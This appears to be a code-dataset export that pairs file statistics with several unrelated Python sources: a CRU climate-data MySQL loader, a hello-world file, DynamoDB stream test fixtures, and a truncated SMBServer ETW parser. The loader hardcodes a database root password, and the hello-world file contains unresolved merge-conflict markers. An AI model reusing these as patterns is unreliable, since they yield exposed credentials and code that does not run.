| 40.45809 | 88 | 0.690966 | 2,563 | 20,755 | 5.536481 | 0.088178 | 0.127555 | 0.067653 | 0.079422 | 0.875546 | 0.868922 | 0.819521 | 0.765962 | 0.734461 | 0.731149 | 0 | 0.046533 | 0.165454 | 20,755 | 512 | 89 | 40.537109 | 0.772704 | 0.077668 | 0 | 0.585242 | 0 | 0 | 0.224727 | 0.018701 | 0 | 0 | 0 | 0 | 0.557252 | 1 | 0.050891 | false | 0 | 0.007634 | 0 | 0.058524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
060f3b47659a8bdb06b5277887449792806a1190 | 7,031 | py | Python | python/cru_normalization.py | fraxen/nordpil_arcpy | 229449450061305bb3f6f7aca50052a3303550d0 | [
"Apache-2.0"
] | null | null | null | python/cru_normalization.py | fraxen/nordpil_arcpy | 229449450061305bb3f6f7aca50052a3303550d0 | [
"Apache-2.0"
] | null | null | null | python/cru_normalization.py | fraxen/nordpil_arcpy | 229449450061305bb3f6f7aca50052a3303550d0 | [
"Apache-2.0"
] | null | null | null | # My little script to try to normalize the heavy txt files supplied with the CGIAR formatted CRU TS 2.1
# Works with an access database
import pyodbc
import subprocess
import os
cnxn = pyodbc.connect('DRIVER=MySQL ODBC 5.1 Driver;SERVER=localhost;DATABASE=cruts21;UID=root;PWD=AlGlut')
cursor = cnxn.cursor()
# {{{ ACTUAL DATA
for Variable in ['cld','dtr','frs','pre','tmn','tmp','tmx','vap','wet']:
print '\n\n-----\nVariable: ' + Variable
cursor.execute("DROP TABLE IF EXISTS "+Variable);
cnxn.commit()
cursor.execute("CREATE TABLE `"+Variable+"` (`RowID` bigint(20) NOT NULL AUTO_INCREMENT,`CellID` bigint(20) NOT NULL,`DataYear` bigint(20) NOT NULL,`M1` bigint(20) NOT NULL,`M2` bigint(20) NOT NULL,`M3` bigint(20) NOT NULL,`M4` bigint(20) NOT NULL,`M5` bigint(20) NOT NULL,`M6` bigint(20) NOT NULL,`M7` bigint(20) NOT NULL,`M8` bigint(20) NOT NULL,`M9` bigint(20) NOT NULL,`M10` bigint(20) NOT NULL,`M11` bigint(20) NOT NULL,`M12` bigint(20) NOT NULL,PRIMARY KEY (`RowID`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
cnxn.commit()
for Period in ['1901-1920','1921-1940','1941-1960','1961-1980','1981-2000','2001-2002']:
print '-- Setting up tables for : ' + Period + ' ('+Variable+')'
startYear = int(Period.split('-')[0])
endYear = int(Period.split('-')[1])
dataField = ""
ignoreFields = "id"
for popYear in range(startYear,endYear+1):
for month in range(1,13):
dataField = dataField + ',`M'+str(month)+'Y'+str(popYear)+'` bigint(20) NOT NULL'
ignoreFields = ignoreFields + ',M' + str(month) + 'Y'+ str(popYear)
cursor.execute("DROP TABLE IF EXISTS `"+Variable+"_"+Period+"_data`")
cursor.execute("CREATE TABLE `"+Variable+"_"+Period+"_data` (`Id` bigint(20) NOT NULL"+dataField+",PRIMARY KEY (`Id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
print '-- Loading data from: ' + Variable+'_'+Period+'_data.txt'
cursor.execute("LOAD DATA INFILE 'c:/mnt/data/ws/cruts/global_DATA/"+Variable+"_"+Period+"_data.txt' INTO TABLE `"+Variable+"_"+Period+"_data` FIELDS TERMINATED BY ',' IGNORE 1 LINES ("+ignoreFields+");")
cnxn.commit()
for popYear in range(startYear,endYear+1):
popYear = str(popYear)
print '-- -- Normalizing year ' + popYear + ' ('+Variable+')'
cursor.execute("INSERT INTO "+Variable+" (CellID, DataYear, M1, M2, M3, M4, M5, M6, M7, M8, M9, M10, M11, M12) SELECT ID AS CellID, "+popYear+" AS DataYear, M1Y"+popYear+" AS M1, M2Y"+popYear+" AS M2, M3Y"+popYear+" AS M3, M4Y"+popYear+" AS M4, M5Y"+popYear+" AS M5, M6Y"+popYear+" AS M6, M7Y"+popYear+" AS M7, M8Y"+popYear+" AS M8, M9Y"+popYear+" AS M9, M10Y"+popYear+" AS M10, M11Y"+popYear+" AS M11, M12Y"+popYear+" AS M12 FROM `"+Variable+"_"+Period+"_data`;")
cnxn.commit()
# }}}
# {{{ STATION RECORD
for Variable in ['cld','dtr','pre','tmp','vap','wet']:
print '\n\n-----\nVariable: ' + Variable + " - station record"
cursor.execute("DROP TABLE IF EXISTS "+Variable+"_stn");
cnxn.commit()
cursor.execute("CREATE TABLE `"+Variable+"_stn` (`RowID` bigint(20) NOT NULL AUTO_INCREMENT,`CellID` bigint(20) NOT NULL,`DataYear` bigint(20) NOT NULL,`M1` bigint(20) NOT NULL,`M2` bigint(20) NOT NULL,`M3` bigint(20) NOT NULL,`M4` bigint(20) NOT NULL,`M5` bigint(20) NOT NULL,`M6` bigint(20) NOT NULL,`M7` bigint(20) NOT NULL,`M8` bigint(20) NOT NULL,`M9` bigint(20) NOT NULL,`M10` bigint(20) NOT NULL,`M11` bigint(20) NOT NULL,`M12` bigint(20) NOT NULL,PRIMARY KEY (`RowID`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
cnxn.commit()
for Period in ['1901-1920','1921-1940','1941-1960','1961-1980','1981-2000','2001-2002']:
print '-- Setting up tables for : ' + Period + ' ('+Variable+') - station record'
startYear = int(Period.split('-')[0])
endYear = int(Period.split('-')[1])
dataField = ""
ignoreFields = "id"
for popYear in range(startYear,endYear+1):
for month in range(1,13):
dataField = dataField + ',`M'+str(month)+'Y'+str(popYear)+'` bigint(20) NOT NULL'
ignoreFields = ignoreFields + ',M' + str(month) + 'Y'+ str(popYear)
cursor.execute("DROP TABLE IF EXISTS `"+Variable+"_"+Period+"_stn`")
cursor.execute("CREATE TABLE `"+Variable+"_"+Period+"_stn` (`Id` bigint(20) NOT NULL"+dataField+",PRIMARY KEY (`Id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
print '-- Loading data from: ' + Variable+'_'+Period+'_stn.txt'
cursor.execute("LOAD DATA INFILE 'c:/mnt/data/ws/cruts/global_stn/"+Variable+"_"+Period+"_stn.txt' INTO TABLE `"+Variable+"_"+Period+"_stn` FIELDS TERMINATED BY ',' IGNORE 1 LINES ("+ignoreFields+");")
cnxn.commit()
for popYear in range(startYear,endYear+1):
popYear = str(popYear)
print '-- -- Normalizing year ' + popYear + ' ('+Variable+') - station record'
cursor.execute("INSERT INTO "+Variable+"_stn (CellID, DataYear, M1, M2, M3, M4, M5, M6, M7, M8, M9, M10, M11, M12) SELECT ID AS CellID, "+popYear+" AS DataYear, M1Y"+popYear+" AS M1, M2Y"+popYear+" AS M2, M3Y"+popYear+" AS M3, M4Y"+popYear+" AS M4, M5Y"+popYear+" AS M5, M6Y"+popYear+" AS M6, M7Y"+popYear+" AS M7, M8Y"+popYear+" AS M8, M9Y"+popYear+" AS M9, M10Y"+popYear+" AS M10, M11Y"+popYear+" AS M11, M12Y"+popYear+" AS M12 FROM `"+Variable+"_"+Period+"_stn`;")
cnxn.commit()
# }}}
cnxn.close()
# ALSO - LOAD COORDINATES! (don't forget to have the ll coords as floating point
# ADD INDEXES...
# ALTER TABLE pre ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE cld ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE dtr ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE frs ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmp ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmx ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE vap ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE wet ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE cld_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE dtr_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE pre_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmp_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE vap_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE wet_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
| 79.897727 | 516 | 0.695491 | 1,023 | 7,031 | 4.743891 | 0.172043 | 0.074181 | 0.077066 | 0.10509 | 0.894292 | 0.857614 | 0.841953 | 0.796621 | 0.796621 | 0.796621 | 0 | 0.05082 | 0.132414 | 7,031 | 87 | 517 | 80.816092 | 0.744754 | 0.289006 | 0 | 0.517241 | 0 | 0.086207 | 0.528844 | 0.034774 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.051724 | null | null | 0.137931 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae0d5c6c4db14d24991ecfc29bf5ab8cacb25616 | 144 | py | Python | hello_world.py | alexkar7/jenkins_python_test | 7eef84fe3679b1b84cfb48837b8aaa9f2a29a71e | [
"MIT"
] | null | null | null | hello_world.py | alexkar7/jenkins_python_test | 7eef84fe3679b1b84cfb48837b8aaa9f2a29a71e | [
"MIT"
] | null | null | null | hello_world.py | alexkar7/jenkins_python_test | 7eef84fe3679b1b84cfb48837b8aaa9f2a29a71e | [
"MIT"
] | null | null | null | <<<<<<< HEAD
# Greeting world
print("¡¡¡Hello World!!!")
=======
print( "¡¡¡Hello World!!!" )
>>>>>>> e6411a80e2fd09aba605658625f68dfa4992f02e
| 18 | 48 | 0.604167 | 12 | 144 | 7.75 | 0.583333 | 0.215054 | 0.27957 | 0.387097 | 0.44086 | 0 | 0 | 0 | 0 | 0 | 0 | 0.20155 | 0.104167 | 144 | 7 | 49 | 20.571429 | 0.472868 | 0.097222 | 0 | 0.4 | 0 | 0 | 0.265625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.4 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ae723273c8e2c0ae3d464a424818bb54d593b169 | 14,655 | py | Python | lambda_streams/conftest.py | byrro/serverless-website-demo | 63bb8ecbcf38b0b39eeb108eb582debed26a00cd | [
"Apache-2.0"
] | 14 | 2020-07-17T13:46:10.000Z | 2021-11-11T19:19:41.000Z | lambda_streams/conftest.py | byrro/serverless-website-demo | 63bb8ecbcf38b0b39eeb108eb582debed26a00cd | [
"Apache-2.0"
] | null | null | null | lambda_streams/conftest.py | byrro/serverless-website-demo | 63bb8ecbcf38b0b39eeb108eb582debed26a00cd | [
"Apache-2.0"
] | 5 | 2020-07-22T04:17:32.000Z | 2021-06-11T19:16:50.000Z | #! /usr/bin/python3.8 Python3.8
import pytest
@pytest.fixture(scope='function', autouse=True)
def load_environment_vars(monkeypatch):
monkeypatch.setenv(
'FIREHOSE_ANALYTICAL_STREAM_NAME', 'firehose-analytical')
monkeypatch.setenv('FIREHOSE_LIKES_STREAM_NAME', 'firehose-likes')
@pytest.fixture()
def sample_ddb_streams():
return {
"Records": [
{
"eventID": "22913059a4e7bb091988bafeccd304c6",
"eventName": "INSERT",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596504,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "0"
}
},
"SequenceNumber": "4827400000000015091308973",
"SizeBytes": 228,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "4dc1735c9f1700aa04e8b41dccda0fe4",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596509,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "1"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "0"
}
},
"SequenceNumber": "4827500000000015091312048",
"SizeBytes": 423,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "03e30497caa63b756f0b41b7994e31e7",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596510,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "2"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "1"
}
},
"SequenceNumber": "4827600000000015091312265",
"SizeBytes": 424,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "7598ab43a2f4e8b5f577adb7c6c89869",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596510,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "3"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "2"
}
},
"SequenceNumber": "4827700000000015091312311",
"SizeBytes": 424,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "eefcd432b29133bfd5c1780d1b66b5e3",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596510,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "4"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "3"
}
},
"SequenceNumber": "4827800000000015091312450",
"SizeBytes": 424,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
}
]
}
| 39.184492 | 172 | 0.279904 | 663 | 14,655 | 6.149321 | 0.165913 | 0.030905 | 0.05298 | 0.024283 | 0.838362 | 0.838362 | 0.838362 | 0.838362 | 0.838362 | 0.838362 | 0 | 0.161953 | 0.611532 | 14,655 | 373 | 173 | 39.289544 | 0.554189 | 0.003753 | 0 | 0.611413 | 0 | 0.013587 | 0.279498 | 0.107236 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005435 | false | 0 | 0.002717 | 0.002717 | 0.01087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
887fc89e967d7fc2993de43e7a018383162af112 | 70,261 | py | Python | etl/parsers/etw/Microsoft_Windows_SMBServer.py | IMULMUL/etl-parser | 76b7c046866ce0469cd129ee3f7bb3799b34e271 | [
"Apache-2.0"
] | 104 | 2020-03-04T14:31:31.000Z | 2022-03-28T02:59:36.000Z | etl/parsers/etw/Microsoft_Windows_SMBServer.py | IMULMUL/etl-parser | 76b7c046866ce0469cd129ee3f7bb3799b34e271 | [
"Apache-2.0"
] | 7 | 2020-04-20T09:18:39.000Z | 2022-03-19T17:06:19.000Z | etl/parsers/etw/Microsoft_Windows_SMBServer.py | IMULMUL/etl-parser | 76b7c046866ce0469cd129ee3f7bb3799b34e271 | [
"Apache-2.0"
] | 16 | 2020-03-05T18:55:59.000Z | 2022-03-01T10:19:28.000Z | # -*- coding: utf-8 -*-
"""
Microsoft-Windows-SMBServer
GUID : d48ce617-33a2-4bc3-a5c7-11aa4f29619e
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1, version=2)
class Microsoft_Windows_SMBServer_1_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"SecurityMode" / Int16ul,
"Capabilities" / Int32ul,
"DialectCount" / Int16ul,
"Dialects" / Int16ul,
"ClientGuid" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=2, version=2)
class Microsoft_Windows_SMBServer_2_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"VcNumber" / Int8ul,
"SecurityMode" / Int8ul,
"Capabilities" / Int32ul,
"Channel" / Int32ul,
"PreviousSessionId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3, version=2)
class Microsoft_Windows_SMBServer_3_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=4, version=2)
class Microsoft_Windows_SMBServer_4_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"PathLength" / Int16ul,
"Path" / Bytes(lambda this: this.PathLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=5, version=2)
class Microsoft_Windows_SMBServer_5_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=6, version=2)
class Microsoft_Windows_SMBServer_6_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=7, version=2)
class Microsoft_Windows_SMBServer_7_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=8, version=2)
class Microsoft_Windows_SMBServer_8_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"SecurityFlags" / Int8ul,
"RequestedOplockLevel" / Int8ul,
"ImpersonationLevel" / Int32ul,
"CreateFlags" / Int64ul,
"RootDirectoryFid" / Int64ul,
"DesiredAccess" / Int32sl,
"FileAttributes" / Int32sl,
"ShareAccess" / Int32sl,
"CreateDisposition" / Int32sl,
"CreateOptions" / Int32sl,
"NameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.NameLength),
"CreateContextsCount" / Int32ul,
"LeaseKey" / Guid,
"LeaseLevel" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=9, version=2)
class Microsoft_Windows_SMBServer_9_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"CloseFlags" / Int16ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=10, version=2)
class Microsoft_Windows_SMBServer_10_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=11, version=2)
class Microsoft_Windows_SMBServer_11_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"Length" / Int32ul,
"Offset" / Int64ul,
"FileId" / Int64ul,
"MinimumCount" / Int32ul,
"Channel" / Int32ul,
"RemainingBytes" / Int32ul,
"ReadChannelInfoOffset" / Int16ul,
"ReadChannelInfoLength" / Int16ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=12, version=2)
class Microsoft_Windows_SMBServer_12_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"Length" / Int32ul,
"Offset" / Int64ul,
"FileId" / Int64ul,
"Channel" / Int32ul,
"RemainingBytes" / Int32ul,
"WriteChannelInfoOffset" / Int16ul,
"WriteChannelInfoLength" / Int16ul,
"WriteFlags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=13, version=2)
class Microsoft_Windows_SMBServer_13_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"OplockLevel" / Int8ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=14, version=2)
class Microsoft_Windows_SMBServer_14_2(Etw):
pattern = Struct(
